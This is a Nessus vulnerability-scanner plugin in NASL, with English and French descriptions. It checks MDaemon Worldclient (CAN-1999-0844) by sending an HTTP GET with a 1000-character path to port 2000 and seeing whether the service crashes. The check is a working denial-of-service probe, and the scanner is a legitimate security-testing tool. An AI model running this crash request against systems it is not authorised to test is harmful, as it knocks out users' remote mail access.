# # This script was written by Renaud Deraison # # See the Nessus Scripts License for details # if(description) { script_id(10139); script_version ("$Revision$"); script_bugtraq_id(823); script_cve_id("CAN-1999-0844"); name["english"] = "MDaemon Worldclient crash"; name["francais"] = "Plantage de Worldclient de MDaemon"; script_name(english:name["english"], francais:name["francais"]); desc["english"] = "It was possible to crash the remote Worldclient, which allows the users to read their mails remotely, by sending : GET /aaaaa[...]aaa HTTP/1.0 This problem allows an attacker to prevent your employees from reading their mails remotely. Solution : contact your vendor for a fix. Risk factor : Serious"; desc["francais"] = "Il s'est avéré possible de faire planter le service Worldclient de mdaemon, utilisé pour lire son mail à distance. Ce problème permet à des pirates d'empecher les utilisateurs de votre réseau de lire leurs mails correctement. Solution : contactez votre vendeur pour un patch. Facteur de risque : Sérieux."; script_description(english:desc["english"], francais:desc["francais"]); summary["english"] = "Crashes the remote service"; summary["francais"] = "Fait planter le service distant"; script_summary(english:summary["english"], francais:summary["francais"]); script_category(ACT_DENIAL); script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison", francais:"Ce script est Copyright (C) 1999 Renaud Deraison"); family["english"] = "Denial of Service"; family["francais"] = "Déni de service"; script_family(english:family["english"], francais:family["francais"]); script_dependencie("find_service.nes", "httpver.nasl"); script_require_ports(2000); exit(0); } # # The script code starts here # include("http_func.inc"); port = 2000; if(get_port_state(port)) { if(http_is_dead(port:port))exit(0); soc = http_open_socket(port); if(soc) { data = http_get(port:port, item:crap(1000)); send(socket:soc, data:data); r = http_recv(socket:soc); http_close_socket(soc); if(http_is_dead(port:port))security_hole(port); } }